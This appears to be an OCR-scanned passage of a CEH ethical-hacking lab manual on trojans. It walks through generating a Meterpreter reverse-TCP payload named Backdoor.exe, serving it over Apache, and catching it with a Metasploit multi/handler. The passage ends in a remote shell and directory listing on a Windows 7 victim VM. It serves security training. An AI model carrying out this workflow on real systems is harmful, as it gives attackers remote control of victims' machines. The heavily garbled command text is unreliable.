d rw x r-x r-x 2 www-data w w -d a ta 4096 2012-10-23 12 ■A
-pet : c l : - ♦ s e rv ic e apache2 s t a r t |
* S ta rtin g web server apache2
h ttp d (p id 3662) a lre a d y running


<< back I track £

-0 3 .
& T o run the FIGURE 11.8: Starting Apache W ebserver
a p a ch e w eb server 11. N ow your Apache web server is running, copy the B a ck d o o r .e x e file
u se th e following
into the share folder. Type the following command cp
/root/D esk top /B ack d oor.exe /var/w w w /share/ and press Enter
/root/.m sf4/data/ex ‫ד« ח״ן־ן‬
BackTrack on W1N-D39MRSHL9E4 - Virtual M ach ine C onn ection
File Action Media Clipboard View Help

ploits /* « I©®©a 11 !»■r» ,

B a ckd oor.exe
‫־״־‬ v‫׳‬ x r o o t 'J b t : ~
R le Edit V iew Terminal Help
ro o ts to t:-# n k d ir /v a r/w w /s h a re
root 0 b t : - 4 1 chaod -R 755 /v a r/w w /s h a r e /
r o o t g b t : '• chown r m/m data:wvw data /v a r/w w v r/s h a r• /- .^
ro o tp b t:* # I s - la /w a r/m m / | grep share
d r w x r - x r x 2 v/^v data ww#r data 4096 2612 JQ -2 1 n ! n 1 utm
r o o t0 b t:* f s e rv ic e apache2 s ta r t
• S ta rtin g web server apache2
h ttp d (p id 3662) a lre a d y running

r o o tflb t:- * c p /r o o t / D e s k t o p /B a c k d o o r .e x e /v a r /w w w /s h a r e /
L i J i : a i i : 111:1 l ..a, tiu - u l : . I i 11: ll 11111:1.
‫י‬ c p /r o o t/ O e v k t Q p / B d c k d o o f .e x e /v a r / w w w / s h a i e /

<< back I track

1 Status: Running

FIGURE 11.9: Running Apache Webserver

12. N ow go to W indow s 7 Virtual Machine, open Firetox or any web

browser, and type the URL http://1 0 . 0 . 0 . 6/s h a r e / 111 the URL field and
then press Enter
N ote: Here is the IP address o f BackTrack; it may vary 111 your
lab environment.

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All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors

W in dow s 7 o n W1N-D39MR5HL9E4 - Virtual M a r in e C onnection ‫י‬

Fil• Action Media Clipboard V !** Halp

‫ »׳‬0 )‫ !> (יי‬Q n 1►;fe 0

Indtx of/th an ’ = ' ‫■׳־‬te
aha'c' C *11‫ ־‬GopfJe - ‫׳‬° *
l£ 1 MottVniUd G«ttin9 $U11*d i..i Su99«a«d SiUt W«t> SUaG^lcfy D B»knw I

Index o f/s h a re
N am e L a s t m od ifie d S u e D e scrip tio n

P aren t Directory

23-0ct-2012 12:12 72K

Apache/2.2.14 (U b tm ru ) Server at 1 0 0 .0 .6 P o rt SO

,W^cwM'WUY... BackTratj^^VI■^J W

FIGURE 11.10: Firefox web browser with Backdoor.exe

13. Download and save the B a ck d o o r .e x e tile in Windows 7 Virtual

Machine, and save tins file on the desktop.
HZ ‫י‬
If you didn't Action Media Clipboard View‫׳‬ Help

have a p a ch e 2 10 ®@0 II 1►ife5

installed, run apt-
g e t install a p a ch e 2

Certified Ethical Hacker


FIGURE 11.11: Saved Backdoor.exe on desktop

14. Switch back to the B ackT rack m achine.

15. O pen the M etasp loit console. To create a handler to handle the
connection Irom victim macliine (Windows 7), type the command u se
exp loit/m ulti/handler and press Enter

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All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors

BackTrack on W IN-D39M R5HL9E4 - Virtual M ach ine C onn ection

m The exploit will be saved Fil• Action M idi• CI!pbo»rd V !** Htfp

on It > ® @ 0 II It >»
Applications Placcs system A I 1UC OCt 23. 12:30 PM ,
/ root/.msf4/data/exploits/
‫י׳‬ v x !te rm in a l
Bnckdoor.e f ' 1* Edlt V1ew Terminal Help

! ( .‫־‬

n sf > nsfpayload w1 ndows/‫ »׳‬e te rp re te r/reverse tc p LHOSW97T1m7b.91 X ^tofefetop/B ackdoor.exe

[ * ] exec: nsfpayload w in d o w s /re te rp re te r/re v e rs e tc p LHOST-192. I$a-e0?9ix > C ^ g w ^ ^ j d o o r

Created by nsfpayload ( h ttp ://M M .n e ta s p lo lt.c o n ) .

Payload: windows/mete rp re te r/re v e rs e tc p
Length: 290 %
O ptions: ("LHOST192.168 .8 . 91 ■<:=*‫>"־‬
wsf > use e x p lo it/n u lti/h a n d le r |
n sf e x p lo it (h a n d le r) >

<< back I track ^

FIGURE 11.12: Exploit the victim machine

16. To use the reverse TCP, type the command s e t payload

w in d ow s/m eterp reter/reverse_tcp and press Enter
BackTrack on W IN-D39M R5HL9E4 - Virtual M ach ine C onn ection •‫ןז« ׳״׳‬
File Action Media Clipboard View Help
< 0 10 ® e e 11 i t ‫ ן‬h *>
Applications Places system £j [>y, 1ue OCt 23. 12:36 PM ,

B ackd o o r.J Fl|e Edit V iew Terminal Help

U=U To set reverse TCP vise

the following command set

msf > tisfpayload w in d o w s/n e te rp re te r/re ve rse tc p LHOST192.168.8.91‫־‬ !esktop/Backdoor.exe
windows/meterpreter/reverse [*1 exec: nsfpayload w ln d o w s /re te rp re te r/re v e rs e tcp LH0ST=192.J68.8 ^ *jp e s k top / Ba c kd 0 0 r i l
- tcP
C r e a te d b y n s f p a y lo a d ( h t t p : / / M M . n e t a s p l o i t . c o n ) .
Payload: w in dow s/m eterpreter/reverse tc p f
Length: 290 :f/
Opt io n s : { ‫־־‬LHOST"->" 192.168 8 .91‫> ״‬
BSl > use e x o lo lt/B u lT l/h a n d le r ^
nsf e x p l o i t ( h a n d l v r ) > l s e t p a y lo a d w i n d o w i / n e t e r p r e t e r / r e v e i s e t c p l
p ay I o n d - > w in d o w s /m e te r p m v r 7 T P V P r C T ‫־־‬r r p 1
flfcf e x p l o i t ( h a n d l e r ) >

<< back I track 5

FIGURE 11.13: Setup die reverse TCP

17. To set the local IP address that will catch the reverse connection, type
the command s e t Ihost 1 0 .0 .0 .6 (B ackT rack IP A d d ress) and press
E nter

C E H L ab M an u al P age 524 E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors

BackTrack 0 ‫ ח‬W1N-D39MR5HL9C4 - Virtual M ach ine C onn ection

Fil• Action M id i* Clipboard V i** H*lp
• it 9 (•) © 0 Ml * •
Applications Placcs system ( * J d I HJC o c t 23. 12:40 PM

1/5 rI A v * Tfcrroinal
B n ck door.J ‫ «י'יז‬Edit View Terminal Help

! n i l > i s f p a y l o a d w in d 01 r f s / » e t e r p r e t e r / r e v e r s e _ t c p 1 H 0 S T -1 9 2 .1 6 8 .8 .9 1 X > D e s k t o p /B a c K d o o r .e x e
I [ ♦ ] e x e c : m s f p a y lo a d w i n d o w s / n e t e r p r e t e r / r e v e r s e t c p L H Q ST -192.1 6 8 . 8 . 9 1 X > D e s k t o p /B a c k d o o r .!

Created by rasfpayload ( h ttp ://w w x .n e ta s p lo it.c o n ) . . — - ""

P a y lo a d : w i n d o v s / m e t e r p r e t e r / r e v e r s e _ t c p
L e n g t h : 298
o p t i o n s : {"LH 05T“= > " 1 9 2 . 1 6 8 .8 .9 1 * }
m sf > u s e e x p l o . i t / 1 1 u l t i / h a n d l e r
msf e x p lo it ( handler) > se t payload w m dow s/neterpreter/reverse Tcp
payload => windows/neTerp re T e r/re ye rse tco
msf e x p lo it (handler) > |set Ih o s t 1 8 . 6 . 5 . 6 |
IhosT => 1 0 . 6 . 0 . 6
e x p lo it ( handler) >__________________________________________________

<< back I track

FIGURE 11.14: set the lost local IP address

18. To start the handler, type the command ex p lo it -j - z and press Enter
BackTrack o n W1N-D39MR5HL9L4 - Virtual M ach ine C onn ection I I 1
File Action Media Clipboard View Help

« ) ® @<a 11 1>• ^ j
Applications Places system [>^j TUe OCt 2 3 .1 2:4 4 PM

■/4 t I ‫י«׳!י״'<יו< “ י־‬
B ackd oor.d File Edit V iew Terminal Help

C r e a te d b y n s f p a y l o a d ( h t t p : / / w w . n e t a s p l o i t . c o n ) .
P a y l o a d : w in d o w s /m e te rp r e t e r / r e v e r s e t c p
L e n g t h : 290
O p t i o n s : { ‫־‬, IHOST■‘= > • '1 9 2 .1 6 8 .8 .9 1 ‫} ״‬
m sf > u s e e x p l o i t / n u l t i / h a n d l e r
m sf e x p l o i t ( h a n d l e r ) > s e t p a y l o a d w i n d o w s / n e t e r p r e t
p a y lo a d => w i n d o w s / r i e t e r p r e t e r / r e v e r s e t c p
m sf e x p l o i t ( h a n d l e r ) > s e t I h o s t 1 8 . 6 . 8 . 6
Ih o st -> 1 0 .0 .0 .6 j
m sf e x p l o i t ( h a n d l e r ) > ! e x p l o i t - j - 1 1
I * ] E x p l o i t r u n n in g a s b a c k g r o u n d jo b

[ - I S t a r t e d r e v e r s e h a n d le r on 1 8 .0 .8 .6 :4 4 4 4
I ‫״־‬I S t a r t i n g t h e p a y lo a d h a n d l e r . . .
m sf e x p l o i t ( h a n d l e r ) > I

<< back I track 5

FIGURE 11.15: Exploit the windows 7 machine

19. N ow switch to the victim m a ch in e (Windows 7) and double-click the

B a ck d o o r.ex e file to run it (which is already downloaded)

20. Again switch to the BackTrack machine and you can see the following

C E H L ab M an u al P age 525 E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council

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Module 06 - Trojans and Backdoors

BackTrack on W IN-D39M R5HL9E4 - Virtual M ach ine C onn ection !- , “ ‫י * י‬

Filt Action M#di* CI1pbo»rd V i•* Htfp

•it S (•) @ O II 1► * »
Applications Places system d M : TUcoct23. 3:02 pm ,

^ a v x ‫!־‬term in al
/ File Edit V iew Terminal H elp
Back( ♦ " *‫ “־‬I 927 e x p l o i t s • 499 a u x i l i a r y • 151 p o s t
«■ 251 ]■ -- •‫ ־‬p a y lo a d s 28 e n c o d e rs 8 nops

1 s t > m sfpayload w in d o w s /iie te r p r e te r /r e v e r s e t c p LHOST-10.0.0 6 X > D esktop B ackdoor.exe

[* ] ex ec : n sfp a y lo a d w in d o ir f s /m e te r p r e te r /r e v e r s e tc p LHOST= X > D esktop B ackdoor.exe

sh : D esktop: i s a d ir e c to r y
msf > m sfpayload w i n d o w s /n e te r p r e te r /r e v e r s e tc p LH0ST=18. 0 .0 . 6 X > D esk to p /B ack d o o r.ex e
l ‫ ״‬J ex ec : n sfp a y lo a d w in d o irfs/m e te rp re te r/re v e rse tc p LHO^I‫ ־‬lft.ft.-O ^TX 0 ‫־*י‬e^1tt’6J»/Back d o o r.e x e

C rea te d by m sfpayload <h t t p : / / * w . n e t a s p l o 1 t . c o 11) .

P ayload: w in d o w s /n e te r p r e te r /r e v e r s e tc p
L ength: 290
O p tio n s: {- LH0ST‫ *<= ״‬10. 0. 0. 6 ‫} ־‬
a k l > u se e x p l o it/m u lti/h a n d le r ^
r s f e x p l o i t ( h a n c le r ) > s e t p ay lo ad w in d o w s /n e te r p r e te r /r e v e r s e tc p
payload => w in d o w s /m e ie r p r e te r /r e v e r s e tc p
aisf e x p l o i t ( h a n d le r) > s e t I h o s t 1 0 .0 .8 .6
I host => 10.0 .0 .6 _
l i l e x p lo it ( handler) > e x p lo it -J -£|
[*] ^loit 1^nnir^a^fca01^o‫״‬r)^|joW/T■ _____________
[ * ] ^ ^ r t ^ t a f e v e r se r a n d ie r of! 1 8 .0 .9 .6 :4 4 4 4
l 3 *‫ ־‬S t a r t i n g t h e p r fy to a d h s r d i e r ^ r r
Lf cl L is.
J iifl e
■lis e xxpploloit(
it (hhandler)
a n d le r ) > [ ‫ ]! •״‬S
ending StJBc (751121 b y te s ) to 1 0 .0 .0 .5
s t ^ e (751128
!]‫ ־‬J I n t e r p r e t e r s e s s io n 1 opened ( 1 0 .C 6 .6 :4 4 4 4 -> 1 0 .0 .8 .5 :4 9 4 5 8 ) a t , 1 2012-18-23 !?‫־‬: 57152 ♦0530 |

l& T o interact
with th e available
FIGURE 11.16: Exploit result of windows 7 machine
se s s io n , you can
u se s e s s io n s -i 21. To interact with the available session, type the command s e s s io n s -i 1
< sessio n id> and press E nter

FIGURE 11.17: creating the session

22. Enter the command sh ell, and press Enter.

C E H L ab M an u al P age 526 E tliical H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors

r .

BackTrack on WIN-D39M RSHL9E4 - Virtual M ach ine C onn ection

| File Action Media Clipboard V ** Help

\ <n 0 (• ) ® o 11 1►
A pp lications P ia c cs s y s t e m d IX‫׳‬ IUC OCt 23, 3:13 PM

^ a n/ x *!terminal
/ File Edit v ie w ifefm m al H elp
Backc Created by msfpayload ( h ttp ://w w w .n e ta s p lo 1 t.c o ■ >.
Payload: w indow s/n e te rp re te r/re ve rse tcp
Length: 290
O ptions: CLHOST*10. 0. 0. 6“ <■‫}"־‬
n k l > use e x p lo it/m u lti/h a n d le r
msf e x p lo it ( handler) > set payload w in d o w s /n e te rp re te r/re v e rs e tc p
payload *> w in d o w s /m e te rp re te r/re v e rs e tc p
«1 s f e x p lo it ( handler) > set !h o s t 16.6 .8 .6
I host 10.0 .0 .6 <‫־‬
B i l e x p lo it ( handler) > e x p lo it - j - 2
[*J E x p lo it running as background job.

[*1 S ta rte d reverse handler on

[ * j S ta rtin g the payload h a n d le r...
I l i l e x p lo it ( handler) > [ * ] Sending stage (752128 bytes) to 10.0 .0 .5
[ * ] M eterpreter session 1 opened (10.6 .0 .6 :4 4 4 4 -> a t 2012-10-

n sf e x p lo it ( handler) > sessions * i 1

[ * ] S ta rtin g in te r a c tio n w ith 1 ...

c!«JS<1V1‫״‬I J Q L |\
M ic ro s o ft Windows T v e / s io if ^ n . 75©tj
Copyright (c ) 2009 M ic ro s o ft C orporation. Al r ig h ts reserved,

c :\users\A iH nln\pesktop> |

FIGURE 11.18: Type the shell command

23. Type the dir command and press Enter It shows all the directories
present on the victim machine (Windows 7).
1- 1° ' r ’
BackTrack on W IN-D39M R5HL9E4 - Virtual M ach ine C onn ection
File Action Media Clipboard View Help

<010 ®@e 111►1fe 5

Applications Places system cj

/ a v‫׳‬ x T e rm in a l
../ File Edit View Terminal Help
»1 s f e x p lo it ( handler) > sessions - i 1
[ - ] In v a lid session id
n sf e x p lo it ( handler) > sessions ■ i 2
[ * ] s ta r tin g in te r a c tio n w ith 2 . . .

in te r p r e te r > s h e ll
Process 2540 created.
Channel 1 crea ted. -
M ic ro s o ft windows [v e rs io n 6.1.76011
C opyright (c ) 2009 M ic ro s o ft C orporation. A l l rig h ts reserved.

C: \Users\Adtnin\Desktop?b i f I
d ir
volume in d riv e c has no la b e l.
Volume S e ria l Nunber i s 6868-71F6

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FIGURE 11.19: check die directories of windows 7

Lab Analysis
Analyze and document die results related to die lab exercise. Give your opinion 011
your target’s security‫ ״‬posture and exposure dirough public and free information.

C E H L ab M a n u al P age 527 E th ica l H a c k in g an d C o u n term easu res Copyright © by EC-Council

All Rights Reserved. Reproduction is Stricdy Prohibited.

T o o l/U tility In fo rm atio n C o llected /O b jectiv es A chieved

M etasploit O u tp u t:
Hack the Windows 7 machine directories

In te rn e t C o n n ectio n R eq u ired
□ Yes 0 No
P latform S upported
0 C lassroom 0 iLabs

C E H L ab M an u al P age 528 E th ica l H a c k in g an d C o u n ten n e asu res Copyright © by EC-Council

A l Rights Reserved. Reproduction is Strictly Prohibited.

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